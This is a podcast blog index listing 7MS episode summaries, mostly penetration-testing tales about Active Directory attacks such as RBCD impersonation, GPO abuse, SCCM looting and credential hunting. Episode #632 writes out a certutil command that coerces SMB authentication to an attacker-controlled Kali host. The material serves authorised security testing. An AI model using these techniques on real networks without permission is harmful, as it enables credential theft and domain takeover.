Blog
7MS #640: Tales of Pentest Pwnage – Part 63
This was my favorite pentest tale of pwnage to date! There's a lot to cover in this episode so I'm going to try and bullet out the TLDR version here:
- Sprinkled farmer files around the environment
- Found high-priv boxes with WebClient enabled
- Added "ghost" machine to the Active Directory (we'll call it GHOSTY)
- RBCD attack to be able to impersonate a domain admin using the [...]
7MS #639: Tales of Pentest Pwnage – Part 62
Today's tale of pentest pwnage talks about the dark powers of the net.py script from impacket.
7MS #638: Tales of Pentest Pwnage – Part 61
Today we're talking pentesting - specifically some mini gems that can help you escalate local/domain/SQL privileges:
- Check the C: drive! If you get local admin and the system itself looks boring, check root of C - might have some interesting scripts or folders with tools that have creds in them.
- Also look at Get-ScheduledTasks
- Find ids and passwords easily in Snaffler output [...]
7MS #637: BPATTY[RELOADED] Release Party
Hello friends, I'm excited to release BPATTY[RELOADED] into the world at https://bpatty.rocks! - which stands for Brian's Pentesting and Technical Tips for You! It's a knowledge base of IT and security bits that help me do a better job doing security stuff! Today I do an ACTUAL 7-minute episode (GASP...what a concept!) covering my favorite bits on the site so far. Enjoy!
7MS #636: A Prelude to BPATTY(RELOADED)
Artificial hype alert! I'm working on a NEW version of BPATTY (Brian's Pentesting and Technical Tips for You), but it is delayed because of a weird domain name hostage negotiation situation. It's weird. But in the meantime I want to talk about the project (which is a pentest documentation library built on Docusaurus) and how I think it will be bigger/better/stronger/faster/cooler than BPATTY v1 (which [...]
7MS #635: Eating the Security Dog Food – Part 7
Today we're talking about eating the security dog food - specifically:
- Satisfying critical security control #1
- Using the Atlassian family of tools to create a ticketing/change control system and wrap it into an asset inventory
- Leveraging Wazuh as a security monitoring system (with eventual plans to leverage its API to feed Atlassian inventory data)
7MS #634: Tales of Pentest Pwnage – Part 60
Hi, today's tale of pentest pwnage covers a few wins and one loss:
- A cool opportunity to drop Farmer "crops" to a domain admin's desktop folder via PowerShell remote session
- Finding super sensitive data by dumpster-diving into a stale C:\Users\Domain-Admin profile
- Finding a vCenter database backup and being unable to pwn it using vcenter_saml_login
7MS #633: How to Create a Security Knowledgebase with Docusaurus
Hey friends, we're doing a little departure from our normal topics and focusing on how to create a security knowledgebase (is that one word or two?) using Docusaurus! It's cool, it's free, it's from Meta and you can get up and going in just a few commands - check out their getting started guide to get rockin' in about 5 minutes. Important files include: [...]
7MS #632: Tales of Pentest Pwnage – Part 59
Today's tale of pentest pwnage includes some fun stuff, including: SharpGPOAbuse helps abuse vulnerable GPOs! Try submitting a harmless POC first via a scheduled task - like ping -n 1 your.kali.ip.address. When you're ready to fire off a task that coerces SMB auth, try certutil -syncwithWU \\your.kali.ip.address\arbitrary-folder. I'm not 100% sure on this, but I think scheduled tasks capture Kerberos tickets temporarily to workstation(s). If [...]
7MS #631: Tales of Pentest Pwnage – Part 58
Hi friends, today's a tale full of test tips and tools to help you in your adventures in pentesting!
SCCM Exploitation
- SCCM Exploitation: The First Cred Is the Deepest II w/ Gabriel Prud'homme - fantastic resource for learning all about attacking SCCM - starting from a perspective of zero creds
- CMLoot - find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares [...]
7MS #630: Epic Road Trip Served with Security Sprinkles
Today I recap a two week personal/biz road trip and talk about the security stuff that got sprinkled into it, including:
- Family members who don't care about their personal security
- Weakpass - a cool collection of word lists for brute-forcing and spraying that I'd never heard of
- Working on two security Webinars for Netwrix (here's part 1: Mastering Password Security & Active Directory Monitoring, [...]